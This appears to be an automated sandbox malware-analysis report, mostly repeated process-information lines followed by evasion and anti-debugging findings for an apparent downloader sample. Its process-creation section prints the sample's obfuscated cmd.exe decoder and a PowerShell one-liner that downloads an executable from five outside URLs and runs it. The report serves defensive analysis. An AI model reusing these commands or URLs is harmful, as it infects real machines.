Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Checks the free space of harddrivesShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to detect virtual machines (SLDT)Show sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E5528C sldt word ptr [eax]17_2_00E5528C
Contains functionality to enumerate running servicesShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: EnumServicesStatusExW,GetTickCount,OpenServiceW,17_2_00E7FB9D
Source: C:\Windows\SysWOW64\startedradar.exeCode function: EnumServicesStatusExW,GetLastError,17_2_00E7FB44
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1823Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1425Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204Thread sleep count: 1823 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 956Thread sleep count: 1425 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4652Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep time: -1844674407370954s >= -30000sJump to behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: powershell.exe, 0000000B.00000002.4525389477.00000000056CB000.00000004.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpBinary or memory string: b:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000B.00000002.4519980685.0000000003629000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_00401C8E LdrGetProcedureAddress,LdrGetProcedureAddress,12_2_00401C8E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B1A36 LoadLibraryA,GetProcAddress,12_2_004B1A36
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B1530 mov eax, dword ptr fs:[00000030h]12_2_004B1530
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B21B0 mov eax, dword ptr fs:[00000030h]12_2_004B21B0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E721B0 mov eax, dword ptr fs:[00000030h]17_2_00E721B0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E71530 mov eax, dword ptr fs:[00000030h]17_2_00E71530
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B1830 GetProcessHeap,HeapFree,12_2_004B1830
Enables debug privilegesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to execute programs as a different userShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004032C9 LogonUserW,12_2_004032C9
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\968.exeProcess created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exeJump to behavior
Source: C:\Windows\SysWOW64\startedradar.exeProcess created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
